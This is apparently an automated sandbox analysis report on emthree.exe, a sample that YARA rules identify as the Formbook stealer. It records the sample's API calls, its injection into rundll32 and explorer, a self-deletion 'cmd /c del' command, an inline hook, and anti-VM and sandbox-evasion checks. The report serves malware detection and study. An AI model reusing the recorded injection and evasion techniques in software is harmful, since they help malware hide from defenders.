Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0102AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029560 NtWriteFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010295F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0102A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029760 NtOpenProcess,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0102A770 NtOpenThread,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029770 NtSetInformationFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029650 NtQueryValueKey,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010296D0 NtCreateKey,
Source: C:\Windows\explorer.exe; Code function: 2_2_06D51A52 NtCreateFile,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9560 NtWriteFile,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EEAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EEA770 NtOpenThread,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EEA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EEB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_04EE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA070 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA120 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9FF0 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9F40 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA06B NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA03A NtReadFile,
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 0_2_032AC164
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 0_2_032AE5A2
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 0_2_032AE5B0
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041E423
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041D73D
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_01004120
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00FFB090
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010099BF
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010A1002
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010BE824
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0100A830
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010120A0
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B20A8
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B28EC
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00FEF900
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0100A309
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B2B28
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0100AB40
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0101EBB0
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010A03DA
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010ADBD2
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0101ABD8
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010923E3
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0109FA2B
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B22AE
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010A4AEF
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B2D07
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B1D55
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_01012581
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B25DD
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00FF841F
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00FFD5E0
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010AD466
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00FE0D20
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010BDFCE
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B1FF1
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010AD616
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_01006E30
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_010B2EF7
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D51A52
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D49CF2
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D49CE9
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D50882
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D48072
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D48069
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D54A0C
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D4F152
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D4CB1F
          Source: C:\Windows\explorer.exe | Code function: 2_2_06D4CB22
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F6D466
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EB841F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EBD5E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F725DD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04ED2581
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F62D82
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F71D55
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EA0D20
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F72D07
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F72EF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EC6E30
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F6D616
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F71FF1
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F7DFCE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F728EC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04ED20A0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F720A8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EBB090
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F7E824
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04ECA830
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F61002
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EC99BF
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EC4120
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EAF900
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F64AEF
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F722AE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F5FA2B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F523E3
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F6DBD2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F603DA
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EDABD8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EDEBB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04ECAB40
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04F72B28
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04ECA309
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D99E40
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D92FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAD73D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAE423
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D92D90
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D92D87
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 04EAB150 appears 133 times
          Source: C:\Users\user\Desktop\emthree.exe | Code function: String function: 00FEB150 appears 124 times
          Source: emthree.exe | Binary or memory string: OriginalFilename vs emthree.exe
          Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMARCUS.dll4 vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276207579.0000000000BBB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276372802.00000000010DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs emthree.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: sfc.dll
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: emthree.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@4/3
          Source: C:\Users\user\Desktop\emthree.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_01
          Source: C:\Users\user\Desktop\emthree.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\emthree.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: emthree.exe | Metadefender: Detection: 35%
          Source: emthree.exe | ReversingLabs: Detection: 64%
          Source: unknown | Process created: C:\Users\user\Desktop\emthree.exe 'C:\Users\user\Desktop\emthree.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\emthree.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\emthree.exe | Process created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\emthree.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: emthree.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: emthree.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: emthree.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: emthree.exe, 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: emthree.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: emthree.exe, Cycle_Jump_Game/Main.cs | .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs | .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs | .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.emthree.exe.460000.0.unpack, Cycle_Jump_Game/Main.cs | .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.emthree.exe.460000.1.unpack, Cycle_Jump_Game/Main.cs | .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stamp
          Source: initial sample | Static PE information: 0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041D0E2 push eax; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041D0EB push eax; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041D095 push eax; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041D14C push eax; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_004082B3 push ebp; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0040E404 push edx; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0041ECE9 push esp; ret
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_0103D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_04EFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D982B3 push ebp; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAD0EB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAD0E2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAD095 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAD14C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02DAECE9 push esp; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02D9E404 push edx; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.70662287757

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
          Source: C:\Users\user\Desktop\emthree.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: emthree.exe PID: 4600, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\emthree.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002D998E4 second address: 0000000002D998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002D99B5E second address: 0000000002D99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\emthree.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\emthree.exe | Window / User API: threadDelayed 368
          Source: C:\Users\user\Desktop\emthree.exe | Window / User API: threadDelayed 820
          Source: C:\Users\user\Desktop\emthree.exe TID: 4612 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 6000 | Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 2872 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1268 | Thread sleep count: 35 > 30
          Source: C:\Windows\explorer.exe TID: 1268 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp | Binary or memory string: VMware
